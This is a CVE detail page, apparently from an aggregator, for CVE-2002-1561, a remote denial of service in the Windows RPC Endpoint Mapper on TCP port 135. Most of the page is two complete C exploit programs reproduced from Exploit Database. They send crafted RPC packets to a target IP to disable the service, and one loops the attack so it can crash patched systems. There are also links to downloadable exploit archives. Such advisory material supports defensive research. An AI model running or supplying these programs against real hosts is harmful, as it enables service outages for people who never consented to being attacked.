CVE-2002-1561 : Detail

CVE-2002-1561

58.24%V4
Network
2003-03-26
04h00 +00:00
2018-10-12
17h57 +00:00
CVE.org
NVD
Notifications for a CVE
Stay informed of any changes for a specific CVE.
Notifications manage

CVE Descriptions

The RPC component in Windows 2000, Windows NT 4.0, and Windows XP allows remote attackers to cause a denial of service (disabled RPC service) via a malformed packet to the RPC Endpoint Mapper at TCP port 135, which triggers a null pointer dereference.

CVE Informations

Metrics

Metrics Score Severity CVSS Vector Source
V2 5 AV:N/AC:L/Au:N/C:N/I:N/A:P nvd@nist.gov

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.
EPSS First.org

Exploit information

Exploit Database EDB-ID : 21951

Publication date : 2002-10-21 22h00 +00:00
Author : lion
EDB Verified : Yes

// source: https://www.securityfocus.com/bid/6005/info The Microsoft Windows RPC service contains a flaw that may allow a remote attacker to cause a denial of service. By sending a specifically malformed packet to TCP port 135, the RPC service will be disabled. This vulnerability was originally reported to only affect Windows 2000. Microsoft has confirmed that Windows NT 4.0 and XP are also vulnerable. It has been reported that installation of the provided patch will cause some problems in IIS environments. Specifically, users who are using COM+ in IIS environments may experience problems with ASP transactions. A variant of this issue has been reported which allegedly affects patched systems. It is apparently possible to trigger this variant by flooding a system with malformed packets. /* ************************************************************************ * MS WIN RPC DoS CODE FROM SPIKE v2.7 * * Compile it use: * cl winnuke.c * * Usage: * winnuke targetip * * Code by lion, Welcomde to HUC Website Http://www.cnhonker.com * 2002/10/22 ************************************************************************ */ #include <winsock2.h> #include <stdio.h> #pragma comment(lib, "ws2_32.lib") char sendcode1[] = "\x05\x00\x0b\x03\x10\x00\x00\x00\x48\x00\x00\x00\x02\x00\x00\x00" "\xd0\x16\xd0\x16\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x01\x00" "\x60\x9e\xe7\xb9\x52\x3d\xce\x11\xaa\xa1\x00\x00\x69\x01\x29\x3f" "\x02\x00\x02\x00\x04\x5d\x88\x8a\xeb\x1c\xc9\x11\x9f\xe8\x08\x00" "\x2b\x10\x48\x60\x02\x00\x00\x00\x05\x00\x00\x01\x10\x00\x00\x00" "\xd0\x16\x00\x00\x8f\x00\x00\x00\x20\x27\x01\x00\x00\x00\x02\x00" "\xf0\x00\x00\x00\x00\x00\x00\x00\xf0\x00\x00\x00"; char sendcode2[] = "\x88\x13\x00\x00\x00\x00\x00\x00\x88\x13\x00\x00"; char sendcode3[] = "\xff\xff\xff\xff\xff\xff\xff\xff\x00\x00\x00\x00\x00\x00\x00\x00" "\x00\x00\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00"; char sendcode4[] = "\xfe\xff\x00\x00\x00\x00\x00\x00\xfe\xff\x00\x00\x3d\x3d\x3d\x3d" "\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d" "\x05\x00\x00\x00\x10\x00\x00\x00\xd0\x16\x00\x00\x8f\x00\x00\x00" "\x50\x10\x01\x00\x00\x00\x02\x00"; char sendcode5[] = "\x05\x00\x00\x00\x10\x00\x00\x00\xd0\x16\x00\x00\x8f\x00\x00\x00" "\x80\xf9\x00\x00\x00\x00\x02\x00"; char sendcode6[] = "\x05\x00\x00\x00\x10\x00\x00\x00\xd0\x16\x00\x00\x8f\x00\x00\x00" "\xb0\xe2\x00\x00\x00\x00\x02\x00"; char sendcode7[] = "\x05\x00\x00\x02\x10\x00\x00\x00\x60\x15\x00\x00\x8f\x00\x00\x00" "\x60\x15\x00\x00\x00\x00\x02\x00"; char sendcode8[] = "\x00\x00\x01\x10\x00\x00\x00\x00\x00\x00\x01\x10\x00\x00"; int main(int argc, char *argv[]) { WSADATA wsaData; WORD wVersionRequested; struct hostent *pTarget; struct sockaddr_in sock; char *targetip; int port,bufsize; SOCKET s; char buffer[20480]; printf("========================= HUC Win2000/XP RPC Nuke V0.10 =======================\r\n"); printf("================= By Lion, Welcome to http://www.cnhonker.com =================\r\n\n"); if (argc < 2) { printf("Usage:\r\n"); printf(" %s <TargetIP> [TargetPort]\r\n", argv[0]); printf("Example:\r\n"); printf(" %s 192.168.0.1\r\n", argv[0]); printf(" %s 192.168.0.1 135\r\n", argv[0]); printf("PS:\r\n"); printf(" If target is XP, try 2 times.\r\n"); exit(1); } wVersionRequested = MAKEWORD(1, 1); if (WSAStartup(wVersionRequested, &wsaData) < 0) return -1; targetip = argv[1]; port = 135; if (argc >= 3) port = atoi(argv[2]); bufsize = 512; if (argc >= 4) bufsize = atoi(argv[3]); s = socket(AF_INET, SOCK_STREAM, 0); if(s==INVALID_SOCKET) { printf("Socket error!\r\n"); exit(1); } printf("Resolving Hostnames...\n"); if ((pTarget = gethostbyname(targetip)) == NULL) { printf("Resolve of %s failed, please try again.\n", argv[1]); exit(1); } memcpy(&sock.sin_addr.s_addr, pTarget->h_addr, pTarget->h_length); sock.sin_family = AF_INET; sock.sin_port = htons((USHORT)port); printf("Connecting...\n"); if ( (connect(s, (struct sockaddr *)&sock, sizeof (sock) ))) { printf("Couldn't connect to host.\n"); exit(1); } printf("Connected!...\n"); printf("Sending Packets...\n"); if (send(s, sendcode1, sizeof(sendcode1)-1, 0) == -1) { printf("Error sending nuke Packets\r\n"); closesocket(s); exit(1); } memset(&buffer, '\x41', 240); send(s, buffer, 240, 0); send(s, sendcode2, sizeof(sendcode2)-1, 0); memset(&buffer, '\x42', 5000); send(s, buffer, 5000, 0); send(s, sendcode3, sizeof(sendcode3)-1, 0); memset(&buffer, '\x43', 512); send(s, buffer, 512, 0); send(s, sendcode4, sizeof(sendcode4)-1, 0); // memset(&buffer, '\x44', 20480); // send(s, buffer, 20480, 0); // /* memset(&buffer, '\x44', 5000); send(s, buffer, 5000, 0); send(s, sendcode5, sizeof(sendcode5)-1, 0); memset(&buffer, '\x45', 5000); send(s, buffer, 5000, 0); send(s, sendcode6, sizeof(sendcode6)-1, 0); memset(&buffer, '\x46', 5000); send(s, buffer, 5000, 0); send(s, sendcode7, sizeof(sendcode7)-1, 0); memset(&buffer, '\x47', 5000); send(s, buffer, 5000, 0); send(s, sendcode8, sizeof(sendcode8)-1, 0); memset(&buffer, '\x48', 5000); send(s, buffer, 5000, 0); // */ printf("Nuked! \r\nIf target is XP, try a again! :)\r\n"); closesocket(s); WSACleanup(); return 0; }
Exploit Database EDB-ID : 21952

Publication date : 2002-10-21 22h00 +00:00
Author : Trancer
EDB Verified : Yes

// source: https://www.securityfocus.com/bid/6005/info The Microsoft Windows RPC service contains a flaw that may allow a remote attacker to cause a denial of service. By sending a specifically malformed packet to TCP port 135, the RPC service will be disabled. This vulnerability was originally reported to only affect Windows 2000. Microsoft has confirmed that Windows NT 4.0 and XP are also vulnerable. It has been reported that installation of the provided patch will cause some problems in IIS environments. Specifically, users who are using COM+ in IIS environments may experience problems with ASP transactions. A variant of this issue has been reported which allegedly affects patched systems. It is apparently possible to trigger this variant by flooding a system with malformed packets. /* * Microsoft Windows NT RPC Service Denial of Service Vulnerability * * Orginal Code By Lion @ http://www.cnhonker.com * Upgraded By Trancer @ http://BinaryVision.tech.nu * * I have notice that even after a Windows NT system is patched aginst this vulnerability with an offical M$ update, * an attacker can still DoS that system if he activate this exploit a lot of times, fast. * So I've upgraded the exploit by looping it and letting you control the times you want to nuke a system * (with a patched 2000\XP 250-400 times is recommended). * * That's it. enjoy :-) \* #include <winsock2.h> #include <stdio.h> #pragma comment(lib, "ws2_32.lib") char sendcode1[] = "\x05\x00\x0b\x03\x10\x00\x00\x00\x48\x00\x00\x00\x02\x00\x00\x00" "\xd0\x16\xd0\x16\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x01\x00" "\x60\x9e\xe7\xb9\x52\x3d\xce\x11\xaa\xa1\x00\x00\x69\x01\x29\x3f" "\x02\x00\x02\x00\x04\x5d\x88\x8a\xeb\x1c\xc9\x11\x9f\xe8\x08\x00" "\x2b\x10\x48\x60\x02\x00\x00\x00\x05\x00\x00\x01\x10\x00\x00\x00" "\xd0\x16\x00\x00\x8f\x00\x00\x00\x20\x27\x01\x00\x00\x00\x02\x00" "\xf0\x00\x00\x00\x00\x00\x00\x00\xf0\x00\x00\x00"; char sendcode2[] = "\x88\x13\x00\x00\x00\x00\x00\x00\x88\x13\x00\x00"; char sendcode3[] = "\xff\xff\xff\xff\xff\xff\xff\xff\x00\x00\x00\x00\x00\x00\x00\x00" "\x00\x00\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00"; char sendcode4[] = "\xfe\xff\x00\x00\x00\x00\x00\x00\xfe\xff\x00\x00\x3d\x3d\x3d\x3d" "\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d" "\x05\x00\x00\x00\x10\x00\x00\x00\xd0\x16\x00\x00\x8f\x00\x00\x00" "\x50\x10\x01\x00\x00\x00\x02\x00"; char sendcode5[] = "\x05\x00\x00\x00\x10\x00\x00\x00\xd0\x16\x00\x00\x8f\x00\x00\x00" "\x80\xf9\x00\x00\x00\x00\x02\x00"; char sendcode6[] = "\x05\x00\x00\x00\x10\x00\x00\x00\xd0\x16\x00\x00\x8f\x00\x00\x00" "\xb0\xe2\x00\x00\x00\x00\x02\x00"; char sendcode7[] = "\x05\x00\x00\x02\x10\x00\x00\x00\x60\x15\x00\x00\x8f\x00\x00\x00" "\x60\x15\x00\x00\x00\x00\x02\x00"; char sendcode8[] = "\x00\x00\x01\x10\x00\x00\x00\x00\x00\x00\x01\x10\x00\x00"; int main(int argc, char *argv[]) { WSADATA wsaData; WORD wVersionRequested; struct hostent *pTarget; struct sockaddr_in sock; char *targetip; int port,bufsize,times,i; SOCKET s; char buffer[20480]; printf("======================= Windows NT Multi RPC Nuke V0.12 ======================\r\n"); printf("=============== Orginal Code By Lion @ http://www.cnhonker.com ===============\r\n"); printf("============= Upgraded By Trancer @ http://BinaryVision.tech.nu ==============\r\n\n"); if (argc < 2) { printf("Usage:\r\n"); printf(" %s <TargetIP> <TargetPort> <BufferSize> <Times>\r\n", argv[0]); printf("Exaple: %s 198.167.0.1 135 512 250\r\n", argv[0]); printf("PS:\r\n"); printf(" If target is XP, try 2 times.\r\n"); exit(1); } wVersionRequested = MAKEWORD(1, 1); if (WSAStartup(wVersionRequested, &wsaData) < 0) return -1; targetip = argv[1]; port = 135; if (argc >= 3) port = atoi(argv[2]); bufsize = 512; if (argc >= 4) bufsize = atoi(argv[3]); times = 1; if (argc >= 5) times = atoi(argv[4]); for (i = 0; i < times; i = i + 1) { s = socket(AF_INET, SOCK_STREAM, 0); if(s==INVALID_SOCKET) { printf("Socket error!\r\n"); exit(1); } printf("Resolving Hostnames...\n"); if ((pTarget = gethostbyname(targetip)) == NULL) { printf("Resolve of %s failed, please try again.\n", argv[1]); exit(1); } memcpy(&sock.sin_addr.s_addr, pTarget->h_addr, pTarget->h_length); sock.sin_family = AF_INET; sock.sin_port = htons((USHORT)port); printf("Connecting...\n"); if ( (connect(s, (struct sockaddr *)&sock, sizeof (sock) ))) { printf("Couldn't connect to host.\n"); exit(1); } printf("Connected!...\n"); printf("Sending Packets...\n"); if (send(s, sendcode1, sizeof(sendcode1)-1, 0) == -1) { printf("Error sending nuke Packets\r\n"); closesocket(s); exit(1); } memset(&buffer, '\x41', 240); send(s, buffer, 240, 0); send(s, sendcode2, sizeof(sendcode2)-1, 0); memset(&buffer, '\x42', 5000); send(s, buffer, 5000, 0); send(s, sendcode3, sizeof(sendcode3)-1, 0); memset(&buffer, '\x43', 512); send(s, buffer, 512, 0); send(s, sendcode4, sizeof(sendcode4)-1, 0); memset(&buffer, '\x44', 20480); send(s, buffer, 20480, 0); memset(&buffer, '\x44', 5000); send(s, buffer, 5000, 0); send(s, sendcode5, sizeof(sendcode5)-1, 0); memset(&buffer, '\x45', 5000); send(s, buffer, 5000, 0); send(s, sendcode6, sizeof(sendcode6)-1, 0); memset(&buffer, '\x46', 5000); send(s, buffer, 5000, 0); send(s, sendcode7, sizeof(sendcode7)-1, 0); memset(&buffer, '\x47', 5000); send(s, buffer, 5000, 0); send(s, sendcode8, sizeof(sendcode8)-1, 0); memset(&buffer, '\x48', 5000); send(s, buffer, 5000, 0); i = i + 1; } if (times < 2) { printf("Nuked! If target is XP, try a again! :)\r\n"); } else { printf("%s was nuked %s times\r\n", argv[1], argv[4]); } closesocket(s); WSACleanup(); return 0; }
Exploit Database EDB-ID : 21953

Publication date : 2002-10-17 22h00 +00:00
Author : Rapid7
EDB Verified : Yes

source: https://www.securityfocus.com/bid/6005/info The Microsoft Windows RPC service contains a flaw that may allow a remote attacker to cause a denial of service. By sending a specifically malformed packet to TCP port 135, the RPC service will be disabled. This vulnerability was originally reported to only affect Windows 2000. Microsoft has confirmed that Windows NT 4.0 and XP are also vulnerable. It has been reported that installation of the provided patch will cause some problems in IIS environments. Specifically, users who are using COM+ in IIS environments may experience problems with ASP transactions. A variant of this issue has been reported which allegedly affects patched systems. It is apparently possible to trigger this variant by flooding a system with malformed packets. https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/21953.tar.gz
Exploit Database EDB-ID : 21954

Publication date : 2002-10-17 22h00 +00:00
Author : anonymous
EDB Verified : Yes

source: https://www.securityfocus.com/bid/6005/info The Microsoft Windows RPC service contains a flaw that may allow a remote attacker to cause a denial of service. By sending a specifically malformed packet to TCP port 135, the RPC service will be disabled. This vulnerability was originally reported to only affect Windows 2000. Microsoft has confirmed that Windows NT 4.0 and XP are also vulnerable. It has been reported that installation of the provided patch will cause some problems in IIS environments. Specifically, users who are using COM+ in IIS environments may experience problems with ASP transactions. A variant of this issue has been reported which allegedly affects patched systems. It is apparently possible to trigger this variant by flooding a system with malformed packets. https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/21954.rar

Products Mentioned

Configuraton 0

Microsoft>>Windows_2000 >> Version *

Microsoft>>Windows_2000 >> Version *

Microsoft>>Windows_2000 >> Version *

Microsoft>>Windows_2000 >> Version *

Microsoft>>Windows_2000_terminal_services >> Version *

Microsoft>>Windows_2000_terminal_services >> Version *

Microsoft>>Windows_2000_terminal_services >> Version *

Microsoft>>Windows_2000_terminal_services >> Version *

Microsoft>>Windows_nt >> Version 4.0

    Microsoft>>Windows_nt >> Version 4.0

    Microsoft>>Windows_nt >> Version 4.0

    Microsoft>>Windows_nt >> Version 4.0

    Microsoft>>Windows_nt >> Version 4.0

      Microsoft>>Windows_nt >> Version 4.0

      Microsoft>>Windows_nt >> Version 4.0

      Microsoft>>Windows_nt >> Version 4.0

      Microsoft>>Windows_nt >> Version 4.0

        Microsoft>>Windows_nt >> Version 4.0

        Microsoft>>Windows_nt >> Version 4.0

        Microsoft>>Windows_nt >> Version 4.0

        Microsoft>>Windows_nt >> Version 4.0

          Microsoft>>Windows_nt >> Version 4.0

          Microsoft>>Windows_nt >> Version 4.0

          Microsoft>>Windows_nt >> Version 4.0

          Microsoft>>Windows_nt >> Version 4.0

            Microsoft>>Windows_nt >> Version 4.0

            Microsoft>>Windows_nt >> Version 4.0

            Microsoft>>Windows_nt >> Version 4.0

            Microsoft>>Windows_nt >> Version 4.0

              Microsoft>>Windows_nt >> Version 4.0

              Microsoft>>Windows_nt >> Version 4.0

              Microsoft>>Windows_nt >> Version 4.0

              Microsoft>>Windows_nt >> Version 4.0

                Microsoft>>Windows_nt >> Version 4.0

                Microsoft>>Windows_nt >> Version 4.0

                Microsoft>>Windows_nt >> Version 4.0

                Microsoft>>Windows_nt >> Version 4.0

                  Microsoft>>Windows_nt >> Version 4.0

                  Microsoft>>Windows_nt >> Version 4.0

                  Microsoft>>Windows_nt >> Version 4.0

                  Microsoft>>Windows_xp >> Version *

                    Microsoft>>Windows_xp >> Version *

                    Microsoft>>Windows_xp >> Version *

                    Microsoft>>Windows_xp >> Version *

                      Microsoft>>Windows_xp >> Version *

                      References

                      http://www.securityfocus.com/bid/6005
                      Tags : vdb-entry, x_refsource_BID
                      http://www.kb.cert.org/vuls/id/261537
                      Tags : third-party-advisory, x_refsource_CERT-VN
                      The information presented on CVE Find originates from several carefully selected reference sources. CVE data is provided by MITRE Corporation and the National Vulnerability Database (NVD). The Known Exploited Vulnerabilities (KEV) catalog is sourced from the Cybersecurity and Infrastructure Security Agency (CISA), while EPSS scores come from FIRST.org. Additionally, data regarding software weaknesses (CWE) and common attack patterns (CAPEC) is maintained by MITRE Corporation, and information on hardware and software configurations (CPE) is provided by the NVD.